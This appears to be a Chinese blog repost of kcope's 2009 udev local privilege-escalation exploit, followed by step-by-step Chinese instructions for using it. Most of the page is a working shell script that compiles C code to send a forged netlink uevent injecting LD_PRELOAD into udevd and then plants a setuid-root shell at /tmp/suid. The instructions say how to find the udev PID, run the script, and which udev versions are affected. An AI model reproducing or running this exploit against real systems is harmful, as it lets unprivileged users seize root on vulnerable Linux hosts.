普通用户通过udev漏洞提升到root权限
2011-12-06 15:26
573 查看
#!/bin/sh # Linux 2.6 # bug found by Sebastian Krahmer # # lame sploit using LD technique # by kcope in 2009 # tested on debian-etch,ubuntu,gentoo # do a 'cat /proc/net/netlink' # and set the first arg to this # script to the pid of the netlink socket # (the pid is udevd_pid - 1 most of the time) # + sploit has to be UNIX formatted text :) # + if it doesn't work the 1st time try more often # # WARNING: maybe needs some FIXUP to work flawlessly ## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang cat > udev.c << _EOF #include <fcntl.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <dirent.h> #include <sys/stat.h> #include <sysexits.h> #include <wait.h> #include <signal.h> #include <sys/socket.h> #include <linux/types.h> #include <linux/netlink.h> #ifndef NETLINK_KOBJECT_UEVENT #define NETLINK_KOBJECT_UEVENT 15 #endif #define SHORT_STRING 64 #define MEDIUM_STRING 128 #define BIG_STRING 256 #define LONG_STRING 1024 #define EXTRALONG_STRING 4096 #define TRUE 1 #define FALSE 0 int socket_fd; struct sockaddr_nl address; struct msghdr msg; struct iovec iovector; int sz = 64*1024; main(int argc, char **argv) { char sysfspath[SHORT_STRING]; char subsystem[SHORT_STRING]; char event[SHORT_STRING]; char major[SHORT_STRING]; char minor[SHORT_STRING]; sprintf(event, "add"); sprintf(subsystem, "block"); sprintf(sysfspath, "/dev/foo"); sprintf(major, "8"); sprintf(minor, "1"); memset(&address, 0, sizeof(address)); address.nl_family = AF_NETLINK; address.nl_pid = atoi(argv[1]); address.nl_groups = 0; msg.msg_name = (void*)&address; msg.msg_namelen = sizeof(address); msg.msg_iov = &iovector; msg.msg_iovlen = 1; socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); bind(socket_fd, (struct sockaddr *) &address, sizeof(address)); char message[LONG_STRING]; char *mp; mp = message; mp += sprintf(mp, "%s@%s", event, sysfspath) +1; mp += sprintf(mp, "ACTION=%s", event) +1; mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1; mp += sprintf(mp, "MAJOR=%s", major) +1; mp += sprintf(mp, "MINOR=%s", minor) +1; mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1; mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1; iovector.iov_base = (void*)message; iovector.iov_len = (int)(mp-message); char *buf; int buflen; buf = (char *) &msg; buflen = (int)(mp-message); sendmsg(socket_fd, &msg, 0); close(socket_fd); sleep(10); // execl("/tmp/suid", "suid", (void*)0); } _EOF gcc udev.c -o /tmp/udev cat > program.c << _EOF #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> #include <sys/stat.h> void _init() { setgid(0); setuid(0); unsetenv("LD_PRELOAD"); // execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL); chown("/tmp/suid",0,0); chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH); } _EOF gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles cat > suid.c << _EOF int main(void) { setgid(0); setuid(0); execl("/bin/sh","sh",0); } _EOF gcc -o /tmp/suid suid.c cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 /tmp/udev $1 # milw0rm.com [2009-04-20] /tmp/suid
将以上代码保存为root.sh, chmod 777 root.sh
然后查询UDEV pid
ps -ef | grep udev
看到ROOT udev pid, 然后减去1 , 如 500 -1 =499
./root.sh 499
注意:
$ rpm -q udev
如果版本号高于或者等于
udev-095-14.20
就无此漏洞,也就是说无法破解。
相关文章推荐
- 普通用户通过udev漏洞提升到root权限演示
- Ubuntu下如何将普通用户提升到root权限
- Ubuntu下如何将普通用户提升到root权限
- Ubuntu16.04如何将普通用户提升至root权限
- Ubuntu下将普通用户提升到root权限
- Ubuntu 普通用户提升到root权限
- [Linux]Ubuntu下如何将普通用户提升到root权限
- Ubuntu下如何将普通用户提升到root权限
- Ubuntu下怎么将普通的用户的权限提升到root权限
- udev漏洞,普通用户变root
- Ubuntu/CentOS下如何将普通用户提升到root权限
- gcc++漏洞 普通用户获取root权限
- linux使普通用户获得root权限的vmsplice系统调用漏洞分析
- Ubuntu下如何将普通用户提升到root权限
- Ubuntu下如何将普通用户提升到root权限
- 在ubuntu下将普通用户提升到root权限
- udev漏洞,普通用户变root
- Ubuntu下如何将普通用户提升到root权限
- Ubuntu下如何将普通用户提升到root权限
- linux gcc++漏洞:普通用户获得root权限